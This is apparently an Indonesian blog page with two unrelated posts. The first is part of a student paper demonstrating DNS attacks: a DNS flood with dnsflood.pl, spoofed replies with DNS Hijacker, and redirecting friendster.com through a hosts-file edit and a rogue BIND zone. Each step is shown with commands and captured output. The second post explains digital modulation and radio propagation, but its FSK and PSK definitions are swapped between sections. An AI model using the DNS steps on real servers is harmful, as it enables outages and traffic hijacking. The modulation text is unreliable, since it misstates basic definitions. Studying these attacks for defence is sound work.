Untuk membuat denial of service pada sebuah server DNS, dapat digunakan skrip

dnsflood.pl3 ( http://www.sainstitute.org/articles/tools/Dnsflood.pl ). DNSflood

berkerja dengan mengirimkan ribuan request/permintaan DNS, yang menyebabkan

server menjadi sibuk dan menghasilkan respon yang menjadi melambat. Contoh

dibawah merupakan contoh dnsflood yang dijalankan dari satu mesin dan server DNS

di query dari mesin lain.

Pertama kali penyerang menjalankan skrip :

[root@fanta dns]# perl dnsflood.pl 128.1.1.100

attacked: 128.1.1.100...

Dibawah ini merupakan keluaran tcpdump dari mesin yang menyerang dengan tipe

paket DNS yang dikirm berbeda-beda, yang masing-masing memiliki port sumber

yang berbeda :

[root@fanta /root]# tcpdump -vvv -X dst port 53

tcpdump: listening on eth0

18:55:53.618983 42.95.39.205.domain > 128.1.1.100.domain: 35698+[|domain] (ttl 64,

id 1565, len 108)

0x0000 4500 006c 061d 0000 4011 a0d3 2a5f 27cd E..l....@...*_'.

0x0010 8001 0164 0035 0035 0058 f00f 8b72 0100 ...d.5.5.X...r..

0x0020 0001 0000 0000 0000 3a63 6b6c 7266 6969 ........:cklrfii

0x0030 7363 6d61 7362 scmasb

18:55:53.621071 95.10.15.152.domain > 128.1.1.100.domain: 35699+[|domain] (ttl 64,

id 1565, len 109)

0x0000 4500 006d 061d 0000 4011 845c 5f0a 0f98 E..m....@..\_...

0x0010 8001 0164 0035 0035 0059 3fbf 8b73 0100 ...d.5.5.Y?..s..

0x0020 0001 0000 0000 0000 3b63 6b6c 7266 6969 ........;cklrfii

0x0030 7363 6d61 7362 scmasb

Untuk menilai dampak dari serangan ini penyerang dari mesin lain pertama kali

membersihkan cache lokalnya dan meng-query server nama target. Membersihkan

cache lokal akan memastikan resolver mendapatkan informasi dari server dan bukan

lokal.

D:\>ipconfig /flushdns

Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

D:\>nslookup

DNS request timed out.

timeout was 2 seconds.

*** Can't find server name for address 128.1.1.100: Timed out

*** Default servers are not available

Default Server: UnKnown

Address: 128.1.1.100

> ms2.sa.com

Server: UnKnown

Address: 128.1.1.100

DNS request timed out.

timeout was 2 seconds.

DNS request timed out.

timeout was 2 seconds.

*** Request to UnKnown timed-out

> ms3.sa.com

Server: UnKnown

Address: 128.1.1.100

DNS request timed out.

timeout was 2 seconds.

Name: ms3.sa.com

Address: 128.1.47.1

> exit

Penyerang kemudian menghentikan serangan dan sekali lagi dari mesin yang lain

meng-query server nama target setelah membersihkan cache.

D:\>ipconfig /flushdns

Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

D:\>nslookup

Default Server: ns1.sa.com

Address: 128.1.1.100

> ms2.rhs.net

Server: ns1.sa.com

Address: 128.1.1.100

Name: ms2.sa.com

Address: 128.1.23.8

> exit

Perbedaan terlihat antara query yang didapatkan selama proses serangan dan setelah

serangan dihentikan. Hal ini membuktikan dampak serangan terhadap performa

server. Jika serangan dilakukan dari beberapa mesin, maka dampak yang dihasilkan

akan lebih besar.

DNS Man in the Middle Attacks – DNS Hijacking

Jika seorang penyerang dapat meletakkan dirinya diantara klien dan server DNS,

maka dia dapat mengambil balasan query resolusi nama ke klien dan mengirimkan

informasi alamat pemetaan yang palsu ke alamat yang salah. Tipe serangan ini

bergantung dari kondisi siapa yang lebih cepat. Jika penyerang ingin serangannya

berhasil, maka pernyerang harus membalas ke klien sebelum server yang

sesungguhnya. Penyerang dapat memperlambat server DNS primer dari klien dengan

menggunakan serangan denial of service. Diagram serangan dapat digambarkan

dibawah ini :

Gambar 4.1 Serangan DNS Man in the Middle (diambil berdasarkan Attacking the

DNS Protocol – Security Paper v2, ESA Certification, Sainstitute.org)

Diagram diatas menggambarkan:

1. Penyerang meletakkan dirinya diantara klien dan server nama.

2. Klien membuat permintaan DNS untuk resolusi www.microsoft.com.

3. Permintaan ini dicuri oleh penyerang yang membalas dengan informasi palsu.

4. Server DNS membalas dengan informasi yang benar.

Kondisi diatas merupakan kondisi “balapan”, klien akan menerima paket dari

pemenangnya.

Untuk mengeksekusi serangan ini, dapat digunakan skrip DNS Hijacker4 (dapat

dilihat di http://www.sainstitute.org/articles/tools/DNS Hijacker ) dan dijalankan pada

mesin penyerang. DNS Hijacker menggunakan tabel fabrikasi untuk menyimpan

informasi yang palsu untuk pengembalian kepada klien. Tabel dibawah ini

menunjukkan hostname ms2.sa.com yang dibentuk untuk membalas dengan alamat

10.10.10.10. Alamat sebenarnya dari ms2.sa.com seperti yang terdapat pada

administrator DNS adalah 128.1.23.8.

[root@fanta dnshijacker]# more ftable

10.10.10.10 ms2.sa.com

Selanjutnya penyerang memulai program DNS Hijacker seperti dibawah ini :

[root@fanta dnshijacker]# dnshijacker -f ftable udp src or dst port 53

[dns hijacker v1.2 ]

sniffing on: eth0

using filter: udp dst port 53 and udp src or dst port 53

fabrication table: ftable

dns activity: 128.1.4.232:1027 > 128.1.1.100:53 [ms2.sa.com = ?]

spoofing answer: 128.1.1.100:53 > 128.1.4.232:1027 [ms2.sa.com =

10.10.10.10]

Permintaan pertama untuk resolusi dari ms2.sa.com dan jawaban yang palsu

dikembalikan oleh penyerang yaitu 10.10.10.10. Dibawah ini merupakan informasi

yang diterima dari sisi klien:

[root@fanta init.d]# nslookup

Default Server: [128.1.1.100]

Address: 128.1.1.100

> ms2.sa.com

Server: [128.1.1.100]

Address: 128.1.1.100

Name: ms2.sa.com

Address: 10.10.10.10

Informasi yang tidak benar dikembalikan ke klien dan diterima. DNS hijacker

mempunyai pilihan a-d dengan semua permintaan DNS diintersep/dicuri dan dibalas

dengan informasi yang tidak benar.

SERANGAN SERVER DNS

Pada bagian ini, akan ditunjukkan implementasi serangn server DNS dengan cara

pribadi yaitu serangan ke DNS lokal yang hanya mempengaruhi alamat IP sendiri saja

dan juga serangan ke server DNS yang mempengaruhi semua klien yang

menggunakan server tersebut.

Melalui DNS Lokal

Cache poisoning dapat dilakukan dengan melakukan perubahan pada DNS komputer

lokal. Dengan perubahan tersebut maka serangan hanya terjadi pada alamat IP lokal

klien tersebut (alamat IP yang digunakan adalah 167.205.66.11 dengan nama LSKK-

11) dan tidak mengenai klien-klien lain. Pada implementasi ini, yang akan dilakukan

adalah merubah pemetaan alamat IP dari www.friendster.com ke alamat IP

167.205.65.5. Alamat IP www.friendster.com yang sebenarnya adalah

209.11.168.242. Langkah-langkahnya adalah :

1. Mengedit file pada C:\WINDOWS\system32\drivers\etc\hosts dengan

menambahkan 167.205.65.5 www.friendster.com.

2. Pada konfigurasi LAN setting di internet explorer, ditambahkan

*.friendster.com.

Dengan melakukan kedua langkah tersebut maka www.friendster.com tidak akan

dilewatkan ke proxy. Maka hasil yang didapatkan adalah :

Gambar 4.2 Tampilan dari 167.205.65.5

Melalui Server DNS

Pada implementasi serangan ini, serangan akan ditujukan pada server DNS. Dampak

dari serangan ini adalah klien-klien yang berada dalam domain server tersebut akan

terserang. Dalam implementasi ini akan dicoba mengalihkan www.friendster.com ke

alamat IP 167.205.65.10. Langkah-langkahnya adalah dengan membuat zona baru:

1. konfigurasi named.conf

zone "friendster.com" {

type master;

file "db.friendster";

};

2. konfigurasi db.friendster

$TTL 30d

@ IN SOA ns.friendster.com. me.frenster.com. (

2004030304 ; serial

1d ; refresh

1h ; retry

30d ; expire

1d ) ; minimum

IN NS ns.friendster.com.

$ORIGIN friendster.com.

www IN A 167.205.65.10

Hasil apabila di query adalah :

^_^ nslookup

Default Server: ns.friendster.com

Address: 167.205.66.11

> ls -d friendster.com

[ns.friendster.com]

$ORIGIN friendster.com.

@ 4w2d IN SOA ns.friendster.com. me.frenster.com. (

2004030304 ; serial

1D ; refresh

1H ; retry

4w2d ; expiry

1D ) ; minimum

4w2d IN NS ns.friendster.com.

www 4w2d IN A 167.205.65.10

@ 4w2d IN SOA ns.friendster.com. me.frenster.com. (

2004030304 ; serial

1D ; refresh

1H ; retry

4w2d ; expiry

1D ) ; minimum

Terlihat bahwa www.friendster.com teralihkan tampilannya ke alamat IP

167.205.65.10, berarti serangan berhasil.

KEAMANAN DNS DARI SERANGAN CACHE

POISONING

Pada umumnya cache poisoning dapat dengan mudah dihadapi. Semua program DNS

mempunyai pilihan untuk mematikan atau menonaktifkan proses caching. Jika proses

caching tidak diaktifkan, menipu balasan kepada sebuah server adalah sia-sia.

Program yang paling terbaru telah mempunyai patch untuk melawan poisoning. Saat

ini, paket-paket yang diterima dengan cacatan authoritative / berkuasa diverifikasi

dahulu sebelum memasukannya ke dalam cache.

Mekanisme dan Implementasi Cache Poisoning Pada DNS Server Sandi Wijaya

EC5010 Keamanan Sistem Informasi ITB

Security

Jika anda memasang DNS server pada komputer yang berfungsi sebagai gateway antara jaringan internal anda dengan jaringan Internet serta DNS Server anda tidak melayani request dari luar (caching only DNS atau DNS untuk jaringan lokal saja) maka anda bisa membuat named untuk melayani hanya jaringan lokal saja dengan menambah baris berikut di dalam blok options:

listen-on { 127.0.0.1; 192.168.1.100; };

Sehingga named hanya membuka port pada interface loopback (127.0.0.1) dan eth0 (192.168.1.100)

REFERENSI

  1. http://www.ilmukomputer.com/umum/diding-dns.php
  2. http://www.sainstitute.org/articles/tools/Dns1.pl
  3. http://www.sainstitute.org/articles/tools/Hds0.pl
  4. http://www.sainstitute.org/articles/tools/Dnsflood.pl

Read More …

Modulasi Digital dan Propagasi Gelombang

Modulasi adalah proses perubahan (varying) suatu gelombang periodik sehingga menjadikan suatu sinyal mampu membawa suatu informasi. Dengan proses modulasi, suatu informasi (biasanya berfrekeunsi rendah) bisa dimasukkan ke dalam suatu gelombang pembawa, biasanya berupa gelombang sinus berfrekuensi tinggi. Terdapat tiga parameter kunci pada suatu gelombang sinusiuodal yaitu : amplitudo, fase dan frekuensi. Ketiga parameter tersebut dapat dimodifikasi sesuai dengan sinyal informasi (berfrekuensi rendah) untuk membentuk sinyal yang termodulasi.

Peralatan untuk melaksanakan proses modulasi disebut modulator, sedangkan peralatan untuk memperoleh informasi informasi awal (kebalikan dari dari proses modulasi) disebut demodulator dan peralatan yang melaksanakan kedua proses tersebut disebut modem.

Informasi yang dikirim bisa berupa data analog maupun digital sehingga terdapat dua jenis modulasi yaitu :

* - modulasi analaog

* - modulasi digital

*

· Modulasi Analog

Dalam modulasi analog, proses modulasi merupakan respon atas informasi sinyal analog.

Teknik umum yang dipakai dalam modulasi analog :

· Modulasi berdasarkan sudut

o Modulasi Fase (Phase Modulation - PM)

o Modulasi Frekuensi (Frequency Modulatio - FM)

· Modulasi Amplitudo (Amplitudo Modulation - AM)

o Double-sideband modulation with unsuppressed carrier (used on the radio AM band)

o Double-sideband suppressed-carrier transmission (DSB-SC)

o Double-sideband reduced carrier transmission (DSB-RC)

o Single-sideband modulation (SSB, or SSB-AM), very similar to single-sideband suppressed carrier modulation (SSB-SC)

o Vestigial-sideband modulation (VSB, or VSB-AM)

o Quadrature amplitude modulation (QAM)

· Modulasi Digital

Modulasi digital merupakan proses penumpangan sinyal digital (bit stream) ke dalam sinyal carrier. Modulasi digital sebetulnya adalah proses mengubah-ubah karakteristik dan sifat gelombang pembawa (carrier) sedemikian rupa sehingga bentuk hasilnya (modulated carrier) memeiliki ciri-ciri dari bit-bit (0 atau 1) yang dikandungnya. Berarti dengan mengamati modulated carriernya, kita bisa mengetahui urutan bitnya disertai clock (timing, sinkronisasi).
Melalui proses modulasi digital sinyal-sinyal digital setiap tingkatan dapat dikirim ke penerima dengan baik. Untuk pengiriman ini dapat digunakan media transmisi fisik (logam atau optik) atau non fisik (gelombang-gelombang radio).

Pada dasarnya dikenal 3 prinsip atau sistem modulasi digital yaitu: ASK, FSK, dan PSK

1. Phase Shift Keying (PSK), digunakan suatu jumlah terbatas berdasarkan fase.

2. Frekeunsi Shift Keying (FSK), digunakan suatu jumlah terbatas berdasarkan frekuensi

3. Amplitudo Shift Keying (ASK), digunakan suatu jumlah terbatas amplitudo.


1. Amplitude Shift Keying

Amplitude Shift Keying (ASK) atau pengiriman sinyal berdasarkan pergeseran amplitude, merupakan suatu metoda modulasi dengan mengubah-ubah amplitude. Dalam proses modulasi ini kemunculan frekuensi gelombang pembawa tergantung pada ada atau tidak adanya sinyal informasi digital. ASK(Amplitudo Shift Keying) adalah modulasi yang menyatakan signal digital 1 sebagai suatu nilai tegangan tertentu (misalnya 1 Volt) dan sinyal digital 0 sebagai sinyal digital dengan tegangan 0 volt. Sinyal ini yang kemudian digunakan untuk menyala-matikan pemancar, kira-kira mirip sinyal morse

Keuntungan yang diperoleh dari metode ini adalah bit per baud (kecepatan digital) lebih besar. Sedangkan kesulitannya adalah dalam menentukan level acuan yang dimilikinya, yakni setiap sinyal yang diteruskan melalui saluran transmisi jarak jauh selalu dipengaruhi oleh redaman dan distorsi lainnya. Oleh sebab itu meoda ASK hanya menguntungkan bila dipakai untuk hubungan jarak dekat saja.

Dalam hal ini faktor derau harus diperhitungkan dengan teliti, seperti juga pada sistem modulasi AM. Derau menindih puncak bentuk-bentuk gelombang yang berlevel banyak dan membuat mereka sukar mendeteksi dengan tepat menjadi level ambangnya.


2. Frequncy Shift Keying

Frequency Shift Keying (FSK) atau pengiriman sinyal melalui penggeseran frekuensi. Metoda ini merupakan suatu bentuk modulasi yang memungkinkan gelombang modulasi menggeser frekuensi output gelombang pembawa. Pergeseran ini terjadi antara harga-harga yang telah ditentukan semula dengan gelombang output yang tidak mempunyai fasa terputus-putus. PSK(Phase Shift Keying) adalah modulasi yang menyatakan signal digital 1 sebagai suatu nilai tegangan tertentu dengan beda fase tertentu pula (misalnya tegangan 1 volt beda fase 0 derajat), dan sinyal digital 0 sebagai suatu nilai tegangan tertentu (yang sama dengan nilai tegangan sinyal PSK bernilai 1, misalnya 1 Volt) dengan beda fase yang berbeda (misalnya 180 derajat). Tentunya pada teknik-teknik yang lebih rumit, Hal ini bisa di modulasi dengan perbedaan fase yang lebih banyak lagi.

Dalam proses modulasi ini besarnya frekuensi gelombang pembawa berubah-ubah sesuai dengan perubahan ada atau tidak adanya sinyal informasi digital.
FSK merupakan metode modulasi yang paling populer. Dalam proses ini gelombang pembawa digeser ke atas dan ke bawah untuk memperoleh bit 1 dan bit 0. Kondisi ini masing-masing disebut space dan mark. Keduanya merupakan standar transmisi data yang sesuai dengan rekomendasi CCITT.

FSK juga tidak tergantung pada teknik on-off pemancar, seperti yang telah ditentukan sejak semula. Kehadiran gelombang pembawa dideteksi untuk menunjukkan bahwa pemancar telah siap.

Dalam hal penggunaan banyak pemancar (multi transmitter), masing-masingnya dapat dikenal dengan frekuensinya. Prinsip pendeteksian gelombang pembawa umumnya dipakai untuk mendeteksi kegagalan sistem bekerja.

Bentuk dari modulated Carrier FSK mirip dengan hasil modulasi FM. Secara konsep, modulasi FSK adalah modulasi FM, hanya disini tidak ada bermacam-macam variasi /deviasi ataupun frekuensi, yang ada hanya 2 kemungkinan saja, yaitu More atau Less (High atau Low, Mark atau Space). Tentunya untuk deteksi (pengambilan kembali dari kandungan Carrier atau proses demodulasinya) akan lebih mudah, kemungkinan kesalahan (error rate) sangat minim/kecil.

Umumnya tipe modulasi FSK dipergunakan untuk komunikasi data dengan Bit Rate (kecepatan transmisi) yang relative rendah, seperti untuk Telex dan Modem-Data dengan bit rate yang tidak lebih dari 2400 bps (2.4 kbps).


3. Phase Shift Keying

Phase Shift Keying (PSK) atau pengiriman sinyal melalui pergeseran fasa. Metoda ini merupakan suatu bentuk modulasi fasa yang memungkinkan fungsi pemodulasi fasa gelombang termodulasi di antara nilai-nilai diskrit yang telah ditetapkan sebelumnya. Dalam proses modulasi ini fasa dari frekuensi gelombang pembawa berubah-ubah sesuai denganperubahan status sinyal informasi digital. FSK(Frequency Shift Keying) adalah Modulasi yang menyatakan sinyal digital 1 sebagai suatu nilai tegangan dengan frekuensi tertentu (misalnya f1 = 1200 HZ), sementara signal digital 0 dinyatakan sebagai suatu nilai tegangan dengan frekuensi tertentu yang berbeda (misalnya f2=2200 Hz). Sama seperti modulasi fase, pada modulasi freukensi yang lebih rumit dapat dilakukan pada beberapa frekuensi sekaligus. Dengan cara ini pengiriman data menjadi lebih effisiensi

Sudut fasa harus mempunyai acuan kepada pemancar dan penerima. Akibatnya, sangat diperlukan stabilitas frekuensi pada pesawat penerima.

Guna memudahkan untuk memperoleh stabilitas pada penerima, kadang-kadang dipakai suatu teknik yang koheren dengan PSK yang berbeda-beda. Hubungan antara dua sudut fasa yang dikirim digunakan untuk memelihara stabilitas. Dalam keadaan seperti ini , fasa yang ada dapat dideteksi bila fasa sebelumnya telah diketahui. Hasil dari perbandingan ini dipakai sebagai patokan (referensi).

Untuk transmisi Data atau sinyal Digital dengan kecepatan tinggi, lebih efisien dipilih system modulasi PSK. Dua jenis modulasi PSK yang sering kita jumpai yaitu :

· BPSK

BPSK adalah format yang paling sederhana dari PSK. Menggunakan dua yang tahap yang dipisahkan sebesar 180° dan sering juga disebut 2-PSK. Modulasi ini paling sempurna dari semua bentuk modulasi PSK. Akan tetapi bentuk modulasi ini hanya mampu memodulasi 1 bit/simbol dan dengan demikian maka modulasi ini tidak cocok untuk aplikasi data-rate yang tinggi dimana bandwidthnya dibatasi.

· QPSK

Kadang-Kadang dikenal sebagai quarternary atau quadriphase PSK atau 4-PSK, QPSK menggunakan empat titik pada diagram konstilasi, terletak di sekitar suatu lingkaran. Dengan empat tahap, QPSK dapat mendekode dua bit per simbol. Hal ini berarti dua kali dari BPSK. Analisa menunjukkan bahwa ini mungkin digunakan untuk menggandakan data rate jika dibandingkan dengan sistem BPSK. Walaupun QPSK dapat dipandang sebagai sebagai suatu modulasi quaternary, lebih mudah untuk melihatnya sebagai dua quadrature carriers yang termodulasi tersendiri. Dengan penafsiran ini, maka bit yang digunakan untuk mengatur komponen phase pada sinyal carrier ketika digunakan untuk mengatur komponen quadrature-phase dari sinyal carrier tersebut. BPSK digunakan pada kedua carrier dan dapat dimodulasi dengan bebas.

Propagasi Gelombang Radio

1. Dasar-Dasar Propagasi Gelombang Radio

· Propagasi Gelombang

Definisi dari propagasi gelombang adalah perambatan gelombang pada media perambatan. Media perambatan atau biasa juga disebut saluran transmisi gelombang dapat berupa fisik yaitu sepasang kawat konduktor, kabel koaksial dan berupa non fisik yaitu gelombang radio atau sinar laser. Pada Gambar 1 merupakan gambaran singkat tentang propagasi gelombang (J, Herman, 1986: 1.4).

http://ab3duh.files.wordpress.com/2010/05/media-propagasi.gif?w=293&h=151

Gambar 1. Propagasi Gelombang

· Gelombang Radio dan Spektrum Elektromagnetik

Gelombang radio termasuk keluarga radiasi elektromagnetik meliputi infra merah (radiasi panas), cahaya tampak (visible light), ultraviolet, sinar-X, dan bahkan panjang gelombang Gamma yang lebih pendek dan sinar kosmik. Gelombang elektromagnetik berasal dari interaksi antara medan listrik dan medan magnet seperti pada Gambar 2 (Reed, 2004: 20.1).

http://ab3duh.files.wordpress.com/2010/05/elektromagnetik.gif?w=240&h=218

Gambar 2. Medan listrik dan magnet pada gelombang elektromagnetik

Pembagian spektrum gelombang elektromagnetik dapat di lihat pada Gambar 3 berikut ini.

http://ab3duh.files.wordpress.com/2010/05/spektrum.gif?w=500&h=219

Gambar 3. Spektrum elektromagnetik

Menurut John (1988: 8-10) Nilai panjang gelombang λ berhubungan dengan frekuensi f dan kecepatan gelombang v, dimana kecepatan gelombang bergantung pada media. Dalam kasus ini medianya adalah ruang bebas (free space/vacuum).

λ= v / f

dimana : v= c (ruang bebas)= 3 x 108 m s-1

Pada Gambar 4 ditunjukkan hubungan antara panjang gelombang dan frekuensi pada v = c. Banyak jenis frekuensi yang ada seperti Gambar 3 diatas. Berikut ini adalah daftar frekuensi yang lebih rinci dalam tabel 1.

http://ab3duh.files.wordpress.com/2010/05/band-frekuensi.gif?w=350&h=330

http://ab3duh.files.wordpress.com/2010/05/gb-band-grafik.gif?w=309&h=273

Gambar 4. Panjang gelombang berbanding frekuensi untuk v = c

· Polarisasi Gelombang Elektromagnetik

J. Herman (1986: 1.43) menyatakan polarisasi gelombang didefinisikan sebagai sifat gelombang elektromagnetik yang menjelaskan arah dan amplitudo vektor kuat medan magnet sebagai fungsi waktu. Ada tiga macam polarisasi gelombang yaitu polarisasi linier, polarisasi lingkaran, dan polarisasi eliptis.

http://ab3duh.files.wordpress.com/2010/05/polarisasi.gif?w=350&h=259

Gambar 5. Polarisasi gelombang elektromagnetik

2. Gelombang Ruang Bebas (Free Space)

· Pembiasan (Refraction) oleh Atmosfir Bumi

Pada atmosfir bumi terjadi pembiasan gelombang sekitar 18 km dari permukaan bumi di daerah khatulistiwa dan sampai sekitar 8 dan 11 km di daerah kutub selatan dan utara. Untuk itu radius bumi diubah disesuaikan demikian hingga kelengkungan relatif antara gelombang dan bumi tetap seperti yang ditunjukkan Gambar 6 Radius kelengkungan bumi yang telah disesuaikan dengan perbandingan antara radius efektif bumi dan radius bumi yang sesungguhnya disebut dengan faktor K. Pada kondisi atmosfir normal, dalam perhitungan radius bumi ekuivalen biasanya digunakan K = 4/3 (J, Herman, 1986: 3.2).

http://ab3duh.files.wordpress.com/2010/05/bumi-equivalen.gif?w=350&h=79

Gambar 6. Radius efektif bumi

http://ab3duh.files.wordpress.com/2010/05/path-profile.gif?w=350&h=202

Gambar 7. Profil lintasan (path profile) dengan faktor K = 4/3

· Propagasi Line of Sight (LOS)

Propagasi gelombang pada frekuensi diatas 30 MHz memanfaatkan gelombang langsung dan gelombang pantul oleh permukaan bumi. Pada Gambar 8 berikut ini adalah gambaran dari propagasi Line of Sight (LOS).

http://ab3duh.files.wordpress.com/2010/05/los.gif?w=350&h=158

Gambar 8. Daerah Freshnel di sekitar lintasan langsung

Pada propagasi LOS terdapat daerah yang harus dan wajib terhindar dari halangan, daerah itu disebut dengan daerah fresnel (fresnel zone). Seperti yang ditunjukkan pada gambar dibawah ini.

http://ab3duh.files.wordpress.com/2010/05/fresnel.gif?w=350&h=146

Gambar 9. Pemetaan daerah-daerah Freshnel

Berdasarkan Gambar 9 dan keterangan di atas, F1 disebut sebagai radius daerah Freshnel pertama, yang dirumuskan dengan (Aswoyo, 2006: 101) :

http://ab3duh.files.wordpress.com/2010/05/rumus-fresnel.gif?w=350&h=64

· Redaman pada ruang bebas (free space loss)

Redaman LOS berharga rata-rata sama dengan redaman ruang bebas. Dalam perhitungan redaman lintasan dianggap tetap sehingga untuk LOS adalah (J, Herman, 1986: 3.29):

Lp = 32,5 + 20 log d (km) + 20 log f (MHz) (2.5)

3. Difraksi (Diffraction) dan Hamburan (Scattering)

· Difraksi oleh Penghalang (Knife Edge Diffraction)

Difraksi adalah kemampuan gelombang untuk berbelok setelah mengalami benturan dengan penghalang. J, Herman (1986: 4.5) menyatakan difraksi oleh bukit, pohon, bangunan dan lain-lain sulit sekali dihitung, akan tetapi perkiraan redamannya dapat diperoleh dengan mengingat harga-harga ekstrim yang disebabkan oleh difraksi rintangan tajam yang menyerap sempurna (Knife Edge Diffraction).

http://ab3duh.files.wordpress.com/2010/05/difraksi.gif?w=348&h=218

Gambar 10. Difraksi pada penghalang

· Hamburan oleh Troposfir (Troposphere Scatter)

Sistem komunikasi radio yang mengunakan sifat hamburan gelombang elektromagnetik oleh partikel-partikel troposfir yang disebut sistem tropo atau thin line troposcattering system. Jaraknya berkisar 200 – 800 km dan frekuensi yang dipakai yaitu 300 – 30.000 MHz berada di daerah UHF dan SHF (J, Herman,1986: 4.11). Pada Gambar 11, adalah mekanisme troposcattering.

http://ab3duh.files.wordpress.com/2010/05/troposcater.gif?w=409&h=206

Gambar 11. Mekanisme hambuiran oleh troposfir.

4. Gelombang Langit (Sky Wave)

· Lonosfir

Lonosfir tersusun dari 3 (tiga) lapisan , mulai dari yang terbawah yang disebut dengan lapisan D, E dan F. Sedangkan lapisan F dibagi menjadi dua, yaitu lapisan F1 dan F2 (yang lebih atas), seperti Gambar 12.

http://ab3duh.files.wordpress.com/2010/05/ionosfir.gif?w=250&h=227

Gambar 12. Lapisan ionosfir

Untuk lebih jelasnya tentang fenomena masing-masing lapisan pada ionosfir klik tombol nama-nama lapisan ionosfir.

  1. Lapisan D terletak sekitar 40 km – 90 km. Ionisasi di lapisan D sangat rendah, karena lapisan ini adalah daerah yang paling jauh dari matahari. Lapisan ini mampu membiaskan gelombang-gelombang yang berfrekuensi rendah. Frekuensi-frekuensi yang tinggi, terus dilewatkan tetapi mengalami redaman. Setelah matahari terbenam, lapisan ini segera menghilang karena ion-ionnya dengan cepat bergabung kembali menjadi molekul-molekul.
  2. Lapisan E terletak sekitar 90 km – 150 km. Lapisan ini, dikenal juga dengan lapisan Kenelly–Heaviside, karena orang-orang inilah yang pertama kali menyebutkan keberadaan lapisan E ini. Setelah matahari terbenam, pada lapisan ini juga terjadi penggabungan ion-ion menjadi molekul-molekul, tetapi kecepatan penggabungannya lebih rendah dibandingkan dengan lapisan D, dan baru bergabung seluruhnya pada tengah malam. Lapisan ini mampu membiaskan gelombang dengan frekuensi lebih tinggi dari gelombang yang bisa dibiaskan lapisan D. Dalam praktek, lapisan E mampu membiaskan gelombang hingga frekuensi 20 MHz.
  3. Lapisan F terdapat pada ketinggian sekitar 150 km – 400 km. Selama siang hari, lapisan F terpecah menjadi dua, yaitu lapisan F1 dan F2. Level ionisasi pada lapisan ini sedemikian tinggi dan berubah dengan cepat se iring dengan pergantian siang dan malam. Pada siang hari, bagian atmosfir yang paling dekat dengan matahari mengalami ionisasi yang paling hebat. Karena atmosfir di daerah ini sangat renggang, maka penggabungan kembali ion-ion menjadi molekul terjadi sangat lambat (setelah terbenam matahari). Karena itu, lapisan ini terionisasi relatif konstan setiap saat. Lapisan F bermanfaat sekali untuk transmisi jarak jauh pada frekuensi tinggi dan mampu membiaskan gelombang pada frekuensi hingga 30 MHz.

· Propagasi Gelombang dalam Ionosfir

Pada frekuensi tinggi atau daerah HF, yang mempunyai range frekuensi 3 – 30 MHz, gelombang dapat dipropagasikan menempuh jarak yang jauh akibat dari pembiasan dan pemantulan lintasan pada lapisan ionospher. Gelombang yang berpropagasi melalui lapisan ionosfer ini disebut sebagai gelombang ionosfer (ionospheric wave) (Aswoyo, 2006: 89).

http://ab3duh.files.wordpress.com/2010/05/propagasi-skywave.gif?w=388&h=200

Gambar 13. Propagasi Gelombang Ionosfir

5. Gelombang Permukaan Bumi (Ground Wave)

· Permukaan Bumi sebagai Penumpu Gelombang Elektromagnetik

Gelombang permukaan bumi berpolarisasi vertikal, karena setiap komponen horisontalnya akan dihubung singkat oleh permukaan bumi. Daerah frekuensi utama gelombang ini adalah 30 kHz – 3 MHz yaitu band MF dan LF dan konfigurasi medannya terlihat seperti pada gambar.

Perubahan kadar air mempunyai pengaruh yang besar terhadap gelombang tanah. Redaman gelombang tanah berbanding lurus terhadap impedansi permukaan tanah. Impedansi ini merupakan fungsi dari konduktivitas dan frekuensi. Jika bumi mempunyai konduktivitas yang tinggi, maka redaman (penyerapan energi gelombang) akan berkurang. Dengan demikian, propagasi gelombang tanah di atas air, terutama air garam (air laut) jauh lebih baik dari pada di tanah kering (berkonduktivitas rendah), seperti padang pasir. Rugi-rugi (redaman) tanah akan meningkat dengan cepat dengan semakin besarnya frekuensi. Karena alasan tersebut, gelombang tanah sangat tidak efektif pada frekuensi di atas 2 MHz.

http://ab3duh.files.wordpress.com/2010/05/tanah.gif?w=449&h=177

Gambar 14. Perambatan Gelombang permukaan bumi

· Propagasi Gelombang dalam Air Laut

Propagasi gelombang permukaan merupakan satu-satunya cara untuk berkomunikasi di dalam lautan Untuk memperkecil redaman laut, maka digunakan frekuensi yang sangat rendah, yaitu band ELF (Extremely Low Frequency), yaitu antara 30 hingga 300 Hz. Dalam pemakaian tertentu dengan frekuensi 100 Hz, redamannya hanya sekitar 0,3 dB per meter. Redaman ini akan meningkat drastis bila frekuensinya makin tinggi, misalnya pada 1 GHz redamannya menjadi 1000 dB per meter.

http://ab3duh.files.wordpress.com/2010/05/kapal-selam.gif?w=441&h=167

Gambar 15. Perambatan antara dua antena dalam air laut

Karakteristik propagasi radio terdiri dari :

  • Multipath Fading
  • Shadowing
  • Difraksi
  • Model propagasi
KARAKTERISTIK PROPAGASI GELOMBANG

Karakteristik propagasi radio sangat penting diketahui pada saat perancangan sistem jaringan akses radio, yaitu dengan mengetahui redaman yang akan terjadi sehingga dapat diprediksi luas cakupan sel yang diinginkan.
Beberapa definisi penting yang berkaitan dengan karakteristik gelombang
dijelaskan sebagai berikut :

  • Propagasi Gelombang : Kelakuan gelombang elektromagnetik yang terjadi ketika merambat pada suatu medium.
  • Kanal Propagasi : medium yang digunakan untuk penjalaran gelombang elektromagnetikPemodelan Kanal Propagasi : pemodelan penjalaran gelombang pada medium untuk mendapatkan prediksi rugi-rugi yang diterima sinyal serta karakteristiknya.
  • Perhitungan Path Loss : perhitungan rugi-rugi sinyal pada suatu jalur tertentu berdasarkan pemilihan pemodelan kanal Secara umum pemodelan kanal propagasi sangat tergantung kepada :
  • Lingkungan diantara pengirim dan penerima.
  • Frekuensi gelombang dan bandwidth informasi yang dikirimkan
  • Gerakan pengirim dan/atau penerima relatif terhadap sekitarnya Analisis tentang karakteristik kanal propagasi akan meliputi 2 hal, yaitu :
    - Redaman propagasi, yang merupakan selisih antara daya kirim dan daya terima.
    - Fading, yang merupakan fluktusai daya yang sampai ke penerima Pemodelan propagasi dapat dikategorikan menjadi empat macam, yaitu :

1. Model Analisis Sederhana :
a. Free Space Loss Analysis
b. Refleksi
c. Difraksi knife-edge
Model ini digunakan pada kasus-kasus khusus pada lintasan individu, semisal microwave link, dll

2. Model area :
a. Okumura-Hatta
b. Walfisch-Ikegami / COST-231
Pemodelan ini digunakan berdasarkan pendekatan statistik dan biasanya digunakan pada perencanaan awal sistem komunikasi seluler.

3. Model Point to Point :
a. Ray Tracing : Lee method
b. Tech Note 101
c. Longley-Rice
